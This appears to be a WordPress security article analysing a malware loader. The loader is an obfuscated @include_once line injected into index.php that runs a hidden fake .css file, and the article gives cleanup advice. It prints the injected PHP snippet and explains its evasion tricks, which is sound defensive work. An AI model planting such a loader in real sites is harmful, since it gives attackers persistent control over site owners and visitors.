Here is what to do if your wordpress site has an include statement in index.php that loads and executes malware.

Tampering that loads malware is in index.php

The malware modifies and embeds the following code in the original index.php in various folders on the WordPress site or, if there is no index.php in the folder, after generating it.

?php
/*9c46d*/

$rhz7 = "/var/www/*******/wp\x2dincludes/p\x68p\x2dcompat/.a8f26ae0.css"; if ($rhz7 . '67'){ @include_once /* 44 */ ($rhz7); }

/*9c46d*/

Analyze malware code

The /*9c46d*/ part is an identifier to determine if other malware (e.g., resident in the server process) has removed the tampering.
If the tampering has been removed, it is possible that other malware that automatically reinfects the server may still be present.

In the $rhz7 = “/var/www/*******/.a8f26ae0.css” section, the body of the malware (which causes malicious behavior such as redirecting the site) is assigned to the variable.
In this case, the malware is disguised as a .css stylesheet.

/wp\x2dincludes/p\x68p\x2dcompat/.a8f26ae0.css

is obfuscated, but when unobfuscated

/wp-includes/php-compat/.a8f26ae0.css

which indicates that the malware itself is in the /wp-includes/php-compat/ folder.

if ($rhz7 . ’67’){ is always positive. This is a meaningless piece of code that prevents it from being caught by the detection.
The same goes for the /* 44 */ comment.

@include_once ($rhz7); You can see that every time index.php is executed, the malware body is loaded and executed with an include_once statement.

How to deal with include statements that load and execute malware

If you remove the code between the malware identifier /*9c46d*/, the malware that is executed every time index.php is accessed will no longer be loaded and executed. However, if the re-modification continues, it is highly likely that there is another reinfecting malware somewhere on the server.
(There may be a process on the server that continues to run malware in an infinite loop.)

If the malware cannot be removed as soon as possible, the search engine may judge the site as a malware-infected site and lower its search ranking, or it may register incorrect search results, or the legitimate page may be sent to another site.

We also recommend that you use plug-ins to perform a comprehensive inspection and removal of malware.
Free WordPress:Malware Scan & Security Plug-in [Malware and Virus Detection and Removal].

Related Posts:

  1. If your wordpress index.php has a one line include statement @include it is infected with malware
    If there is a one-line include statement @include in the index.php in the top directory of WordPress or in the theme, etc., it is highly likely that the site is infected with malware....
  2. How to target @include \057var/\167ww at the top of wordpress wp-config.php or index.php
    This page explains the cause and how to target a string starting with @include that suddenly appears at the top of wp-config.php or index.php in WordPress....
  3. HTACCESS and Index.php files tampered with again in an instant in WordPress
    We would like to introduce a case of WordPress tampering in which the HTACCESS and Index.php files were instantly tampered with again, even after the malware was removed. Tampering that resurfaces even after deleting and deleting This malware is a backdoor that is planted in other websites on the server. Each time the site is accessed, the malware examines the...
  4. New WordPress tampering technique, inclusion of .ccss malware
    The new WordPress tampering technique, the inclusion of .ccss malware, will be explained....
  5. File containing index.html.bak.bak infecting malware index.php
    This section describes malware files including index.html.bak.bak that infects index.php....
  6. WordPress index.php malware (virus) infection case
    If you find the following code in some index.php files included in your WordPress site, you are infected with malware and should be careful....